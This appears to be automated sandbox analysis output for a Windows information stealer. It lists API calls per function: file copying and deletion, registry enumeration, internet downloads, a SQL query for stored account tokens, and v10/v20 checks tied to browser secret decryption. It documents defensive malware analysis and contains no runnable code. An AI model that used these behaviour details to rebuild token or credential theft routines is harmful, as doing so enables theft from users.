                                                          • Part of subcall function 02D04B77: wsprintfA.USER32 ref: 02D04C49
                                                          • Part of subcall function 02D04B77: PathMatchSpecA.SHLWAPI(?,?), ref: 02D04C85
                                                          • Part of subcall function 02D04B77: lstrcat.KERNEL32(?,0064A524), ref: 02D04CB1
                                                          • Part of subcall function 02D04B77: lstrcat.KERNEL32(?,00420FF8), ref: 02D04CC3
                                                          • Part of subcall function 02D04B77: lstrcat.KERNEL32(?,?), ref: 02D04CD7
                                                          • Part of subcall function 02D04B77: lstrcat.KERNEL32(?,00420FFC), ref: 02D04CE9
                                                          • Part of subcall function 02D04B77: lstrcat.KERNEL32(?,?), ref: 02D04CFD
                                                          • Part of subcall function 02D04B77: CopyFileA.KERNEL32(?,?,00000001), ref: 02D04D13
                                                          • Part of subcall function 02D04B77: DeleteFileA.KERNEL32(?), ref: 02D04D98
                                                        • memset.MSVCRT ref: 02D05192
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1574689759.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2cf0000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                        • String ID:
                                                        • API String ID: 4017274736-0
                                                        • Opcode ID: 53c49ebc4b6c987f3a25fb04f0f9e833fe86fb43a5b4eada2cc9e881564654d5
                                                        • Instruction ID: 4970ce383fee1e84660c465cfa64b45ca309c6f93521f03d553dbdd6e6bb5387
                                                        • Opcode Fuzzy Hash: 53c49ebc4b6c987f3a25fb04f0f9e833fe86fb43a5b4eada2cc9e881564654d5
                                                        • Instruction Fuzzy Hash: 1241D579A4031467C750F7B0EC86FD93739EB24701F404495A689661D0EEB85BC88FA2
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0064A360,00000000,?,00420E2C,00000000,?,00000000), ref: 02D08397
                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 02D0839E
                                                        • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 02D083BF
                                                        • __aulldiv.LIBCMT ref: 02D083D9
                                                        • __aulldiv.LIBCMT ref: 02D083E7
                                                        • wsprintfA.USER32 ref: 02D08413
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1574689759.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2cf0000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                                        • String ID: @
                                                        • API String ID: 2774356765-2766056989
                                                        • Opcode ID: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                                        • Instruction ID: 1f790ad68bc6dc7499b2cde4edc99c297d8d1cfa1a25c49265d5f32d08ce0b2d
                                                        • Opcode Fuzzy Hash: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                                        • Instruction Fuzzy Hash: 62210BB1E44218ABDB00DFD4DC89FAEB7B9FB45B14F104509F605BB2D0D778A9018BA9
                                                        APIs
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                          • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                          • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                          • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                          • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                                        • lstrlenA.KERNEL32(00000000), ref: 0040BC9F
                                                          • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                                        • StrStrA.SHLWAPI(00000000,AccountId), ref: 0040BCCD
                                                        • lstrlenA.KERNEL32(00000000), ref: 0040BDA5
                                                        • lstrlenA.KERNEL32(00000000), ref: 0040BDB9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
                                                        • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                                        • API String ID: 1440504306-1079375795
                                                        • Opcode ID: 182d67c0191f180266542c51a553aab92d802969267d2949ed4017f0d963be07
                                                        • Instruction ID: 1db97c5984eaf975dbf010622291b68d8c4d82df198c84c91f10bdfb5a5a1c79
                                                        • Opcode Fuzzy Hash: 182d67c0191f180266542c51a553aab92d802969267d2949ed4017f0d963be07
                                                        • Instruction Fuzzy Hash: 8CB19671911108ABDB04FBA1DD52EEE7339AF14314F40452EF506B2091EF386E99CBBA
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExitProcess$DefaultLangUser
                                                        • String ID: B
                                                        • API String ID: 1494266314-2248957098
                                                        • Opcode ID: 06d82b50bec3daad471bac9186370b40fc7c44d51d66305ede144e8412a302ef
                                                        • Instruction ID: a53c6ee3ffce5caaac90cf9b44aa2343e9827e2133a721021c11305bfc7fe0eb
                                                        • Opcode Fuzzy Hash: 06d82b50bec3daad471bac9186370b40fc7c44d51d66305ede144e8412a302ef
                                                        • Instruction Fuzzy Hash: C2F03A38984209FFE3549FE0A90976C7B72FB06702F04019DF709862D0D6748A519B96
                                                        APIs
                                                        • memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                                          • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                          • Part of subcall function 00410A60: memset.MSVCRT ref: 00410C1C
                                                          • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00000000), ref: 00410C35
                                                          • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00420D7C), ref: 00410C47
                                                          • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00000000), ref: 00410C5D
                                                          • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00420D80), ref: 00410C6F
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                        • memcmp.MSVCRT(?,v10,00000003), ref: 00409EAF
                                                        • memset.MSVCRT ref: 00409EE8
                                                        • LocalAlloc.KERNEL32(00000040,?), ref: 00409F41
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcat$lstrcpymemcmpmemset$AllocLocal
                                                        • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                                                        • API String ID: 1977917189-1096346117
                                                        • Opcode ID: 191b2616e1fb3493a53b7252654be595687e3ce1a8345bb1b47cea2af286b9d8
                                                        • Instruction ID: cfc602575c7eb8b90e75612a825b183f0a0020e5ceb1952e76b28d7f8d83ce04
                                                        • Opcode Fuzzy Hash: 191b2616e1fb3493a53b7252654be595687e3ce1a8345bb1b47cea2af286b9d8
                                                        • Instruction Fuzzy Hash: C9615F30A00248EBCB24EFA5DD96FED7775AF44304F408029F90A6F1D1DB786A56CB5A
                                                        APIs
                                                          • Part of subcall function 02CF7537: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 02CF75A1
                                                          • Part of subcall function 02CF7537: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 02CF7618
                                                          • Part of subcall function 02CF7537: StrStrA.SHLWAPI(00000000,004217EC,00000000), ref: 02CF7674
                                                          • Part of subcall function 02CF7537: GetProcessHeap.KERNEL32(00000000,?), ref: 02CF76B9
                                                          • Part of subcall function 02CF7537: HeapFree.KERNEL32(00000000), ref: 02CF76C0
                                                        • lstrcat.KERNEL32(0064A668,004217FC), ref: 02CF786D
                                                        • lstrcat.KERNEL32(0064A668,00000000), ref: 02CF78AF
                                                        • lstrcat.KERNEL32(0064A668,00421800), ref: 02CF78C1
                                                        • lstrcat.KERNEL32(0064A668,00000000), ref: 02CF78F6
                                                        • lstrcat.KERNEL32(0064A668,00421804), ref: 02CF7907
                                                        • lstrcat.KERNEL32(0064A668,00000000), ref: 02CF793A
                                                        • lstrcat.KERNEL32(0064A668,00421808), ref: 02CF7954
                                                        • task.LIBCPMTD ref: 02CF7962
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1574689759.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2cf0000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                                        • String ID:
                                                        • API String ID: 2677904052-0
                                                        • Opcode ID: 9128ed74142edb21baca04feacde88044c17a1dba194879cafba99f4cf808b72
                                                        • Instruction ID: 88cd7930c09cb9616d2e0d577a724f07e8d8bf5a76ddfa6c4d465a8d7f8e2829
                                                        • Opcode Fuzzy Hash: 9128ed74142edb21baca04feacde88044c17a1dba194879cafba99f4cf808b72
                                                        • Instruction Fuzzy Hash: 03311E7AA40109EFDB88FBE0DC94DFE777BEB49301F145118E206672A0DA35A946CF61
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00404FCA
                                                        • HeapAlloc.KERNEL32(00000000), ref: 00404FD1
                                                        • InternetOpenA.WININET(00420DDF,00000000,00000000,00000000,00000000), ref: 00404FEA
                                                        • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00405011
                                                        • InternetReadFile.WININET(00415EDB,?,00000400,00000000), ref: 00405041
                                                        • memcpy.MSVCRT(00000000,?,00000001), ref: 0040508A
                                                        • InternetCloseHandle.WININET(00415EDB), ref: 004050B9
                                                        • InternetCloseHandle.WININET(?), ref: 004050C6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Internet$CloseHandleHeapOpen$AllocFileProcessReadmemcpy
                                                        • String ID:
                                                        • API String ID: 3894370878-0
                                                        • Opcode ID: a56c18f6a8e036f8b5130d6e607b8bed7a49f8965ae2d7d0d74e6c8ccafdc211
                                                        • Instruction ID: cb0899809939a0b3ab7ef321ba077ef70f04c27eec1e373fde9f1e9505320bf0
                                                        • Opcode Fuzzy Hash: a56c18f6a8e036f8b5130d6e607b8bed7a49f8965ae2d7d0d74e6c8ccafdc211
                                                        • Instruction Fuzzy Hash: 2A3108B8A40218ABDB20CF94DC85BDDB7B5EB48704F1081E9F709B7281C7746AC58F99
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 02CF5231
                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 02CF5238
                                                        • InternetOpenA.WININET(00420DDF,00000000,00000000,00000000,00000000), ref: 02CF5251
                                                        • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 02CF5278
                                                        • InternetReadFile.WININET(?,?,00000400,00000000), ref: 02CF52A8
                                                        • memcpy.MSVCRT(00000000,?,00000001), ref: 02CF52F1
                                                        • InternetCloseHandle.WININET(?), ref: 02CF5320
                                                        • InternetCloseHandle.WININET(?), ref: 02CF532D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1574689759.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2cf0000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                                                        • String ID:
                                                        • API String ID: 1008454911-0
                                                        • Opcode ID: 115837f6574749958b6ecbcaee2c688be1f676679876c6a36d0e4ab8fe972489
                                                        • Instruction ID: afff85fb629c91957c11861dfd6be0fdf7c8e72e887b6ec00fd17468829a0b51
                                                        • Opcode Fuzzy Hash: 115837f6574749958b6ecbcaee2c688be1f676679876c6a36d0e4ab8fe972489
                                                        • Instruction Fuzzy Hash: F231F8B8A40218ABDB60CF94DC85BDCB7B5EB48704F5081D9E709A7280D7746EC5CF99
                                                        APIs
                                                          • Part of subcall function 02D0AA87: lstrlen.KERNEL32(02CF516C,?,?,02CF516C,00420DDE), ref: 02D0AA92
                                                          • Part of subcall function 02D0AA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 02D0AAEC
                                                          • Part of subcall function 02D0A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02D0A9EF
                                                        • StrCmpCA.SHLWAPI(00000000,004210C8,00000000), ref: 02D058AB
                                                        • StrCmpCA.SHLWAPI(00000000,004210D0), ref: 02D05908
                                                        • StrCmpCA.SHLWAPI(00000000,004210E0), ref: 02D05ABE
                                                          • Part of subcall function 02D0AA07: lstrcpy.KERNEL32(?,00000000), ref: 02D0AA4D
                                                          • Part of subcall function 02D05457: StrCmpCA.SHLWAPI(00000000,0042108C), ref: 02D0548F
                                                          • Part of subcall function 02D0AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02D0AB6C
                                                          • Part of subcall function 02D05527: StrCmpCA.SHLWAPI(00000000,0042109C,00000000), ref: 02D0557F
                                                          • Part of subcall function 02D05527: lstrlen.KERNEL32(00000000), ref: 02D05596
                                                          • Part of subcall function 02D05527: StrStrA.SHLWAPI(00000000,00000000), ref: 02D055CB
                                                          • Part of subcall function 02D05527: lstrlen.KERNEL32(00000000), ref: 02D055EA
                                                          • Part of subcall function 02D05527: strtok.MSVCRT(00000000,?), ref: 02D05605
                                                          • Part of subcall function 02D05527: lstrlen.KERNEL32(00000000), ref: 02D05615
                                                        • StrCmpCA.SHLWAPI(00000000,004210D8,00000000), ref: 02D059F2
                                                        • StrCmpCA.SHLWAPI(00000000,004210E8,00000000), ref: 02D05BA7
                                                        • StrCmpCA.SHLWAPI(00000000,004210F0), ref: 02D05C73
                                                        • Sleep.KERNEL32(0000EA60), ref: 02D05C82
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1574689759.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2cf0000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpylstrlen$Sleepstrtok
                                                        • String ID:
                                                        • API String ID: 3630751533-0
                                                        • Opcode ID: db5533aa26391db7b09057ab882c831095ddfd6089117583eb43885adc9af707
                                                        • Instruction ID: 1282eef3530582fad090096edb04a11d1d4e74790e76821cf87f0cdb9ee80294
                                                        • Opcode Fuzzy Hash: db5533aa26391db7b09057ab882c831095ddfd6089117583eb43885adc9af707
                                                        • Instruction Fuzzy Hash: AFE10B75900204AACB18FBA1EDD5BED737AEF55300F90816D9606662E0EF746F48CFA1
                                                        APIs
                                                        • memset.MSVCRT ref: 02CF158E
                                                          • Part of subcall function 02CF1507: GetProcessHeap.KERNEL32(00000000,00000104), ref: 02CF151B
                                                          • Part of subcall function 02CF1507: RtlAllocateHeap.NTDLL(00000000), ref: 02CF1522
                                                          • Part of subcall function 02CF1507: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 02CF153E
                                                          • Part of subcall function 02CF1507: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 02CF155C
                                                          • Part of subcall function 02CF1507: RegCloseKey.ADVAPI32(?), ref: 02CF1566
                                                        • lstrcat.KERNEL32(?,00000000), ref: 02CF15B6
                                                        • lstrlen.KERNEL32(?), ref: 02CF15C3
                                                        • lstrcat.KERNEL32(?,004262EC), ref: 02CF15DE
                                                          • Part of subcall function 02D0A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02D0A9EF
                                                          • Part of subcall function 02D0AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02D0AC2C
                                                          • Part of subcall function 02D0AC17: lstrcpy.KERNEL32(00000000), ref: 02D0AC6B
                                                          • Part of subcall function 02D0AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02D0AC79
                                                          • Part of subcall function 02D0AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02D0AB6C
                                                          • Part of subcall function 02D08DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,02CF1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 02D08DED
                                                          • Part of subcall function 02D0AB87: lstrcpy.KERNEL32(00000000,?), ref: 02D0ABD9
                                                          • Part of subcall function 02D0AB87: lstrcat.KERNEL32(00000000), ref: 02D0ABE9
                                                        • CopyFileA.KERNEL32(?,00000000,00000001), ref: 02CF16CC
                                                          • Part of subcall function 02D0AA07: lstrcpy.KERNEL32(?,00000000), ref: 02D0AA4D
                                                          • Part of subcall function 02CF9C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 02CF9C53
                                                          • Part of subcall function 02CF9C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 02CF9C78
                                                          • Part of subcall function 02CF9C27: LocalAlloc.KERNEL32(00000040,?), ref: 02CF9C98
                                                          • Part of subcall function 02CF9C27: ReadFile.KERNEL32(000000FF,?,00000000,02CF16F6,00000000), ref: 02CF9CC1
                                                          • Part of subcall function 02CF9C27: LocalFree.KERNEL32(02CF16F6), ref: 02CF9CF7
                                                          • Part of subcall function 02CF9C27: CloseHandle.KERNEL32(000000FF), ref: 02CF9D01
                                                        • DeleteFileA.KERNEL32(00000000), ref: 02CF1756
                                                        • memset.MSVCRT ref: 02CF177D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1574689759.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2cf0000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlenmemset$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                                        • String ID:
                                                        • API String ID: 3885987321-0
                                                        • Opcode ID: a966d81fa4e61ce0bb2f82015b0395006b0000ef8fd52be6194f2f88bed640a7
                                                        • Instruction ID: 953ea39e93421fb6e7c3796b7ef5432b9ab94977623250ea34bfc1e20fae34a5
                                                        • Opcode Fuzzy Hash: a966d81fa4e61ce0bb2f82015b0395006b0000ef8fd52be6194f2f88bed640a7
                                                        • Instruction Fuzzy Hash: 53513BB59402199BCB55EB60DD91FED737AEF54300F4041ACA70A621E0EE706F89CFA5
                                                        APIs
                                                        • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00418426
                                                        • wsprintfA.USER32 ref: 00418459
                                                        • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0041847B
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0041848C
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00418499
                                                          • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                        • RegQueryValueExA.ADVAPI32(00000000,02EB9C80,00000000,000F003F,?,00000400), ref: 004184EC
                                                        • lstrlenA.KERNEL32(?), ref: 00418501
                                                        • RegQueryValueExA.ADVAPI32(00000000,02EB9C98,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00420B34), ref: 00418599
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00418608
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0041861A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                                        • String ID: %s\%s
                                                        • API String ID: 3896182533-4073750446
                                                        • Opcode ID: 31ba4a9b52ae66b65e43e00cd9c953ecc48c3f07dc5bf7da1f470b90c4e60b6b
                                                        • Instruction ID: cdbcbf4b9f8a1ecee5159c9abe2ba9d8dffcfa3e02281556f53420590b8fae77
                                                        • Opcode Fuzzy Hash: 31ba4a9b52ae66b65e43e00cd9c953ecc48c3f07dc5bf7da1f470b90c4e60b6b
                                                        • Instruction Fuzzy Hash: 7B210A75940218AFDB24DB54DC85FE9B3B9FB48704F00C199E60996140DF756A85CFD4
                                                        APIs
                                                        • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02CF4A51
                                                        • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02CF4A68
                                                        • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02CF4A7F
                                                        • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 02CF4AA0
                                                        • InternetCrackUrlA.WININET(00000000,00000000), ref: 02CF4AB0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1574689759.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2cf0000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ??2@$CrackInternetlstrlen
                                                        • String ID: <
                                                        • API String ID: 1683549937-4251816714
                                                        • Opcode ID: c4016b40be7962ab96eee41e1f0a74c78e609d749f91f5b1f2864e454020d9f4
                                                        • Instruction ID: 366d6ce8779557431471cff476271c48972046d5b3edd00d833e8275d74b12b8
                                                        • Opcode Fuzzy Hash: c4016b40be7962ab96eee41e1f0a74c78e609d749f91f5b1f2864e454020d9f4
                                                        • Instruction Fuzzy Hash: 71213BB5D00219ABDF14DFA4E849BED7B75FF44321F108229E925A72D0EB706A05CF91
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004176A4
                                                        • HeapAlloc.KERNEL32(00000000), ref: 004176AB
                                                        • RegOpenKeyExA.ADVAPI32(80000002,02EB3900,00000000,00020119,00000000), ref: 004176DD
                                                        • RegQueryValueExA.ADVAPI32(00000000,02EB9B00,00000000,00000000,?,000000FF), ref: 004176FE
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00417708
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                        • String ID: Windows 11
                                                        • API String ID: 3466090806-2517555085
                                                        • Opcode ID: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                                        • Instruction ID: 0438ef7ee9a5fbee92b010be2e89678c99e6505f2a73f727aa840deaa157456b
                                                        • Opcode Fuzzy Hash: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                                        • Instruction Fuzzy Hash: E0018FBDA80204BFE700DBE0DD49FAEB7BDEB09700F004055FA05D7290E674A9408B55
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 02D0790B
                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 02D07912
                                                        • RegOpenKeyExA.ADVAPI32(80000002,0064A398,00000000,00020119,00000000), ref: 02D07944
                                                        • RegQueryValueExA.ADVAPI32(00000000,0064A434,00000000,00000000,?,000000FF), ref: 02D07965
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 02D0796F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1574689759.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2cf0000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                        • String ID: Windows 11
                                                        • API String ID: 3225020163-2517555085
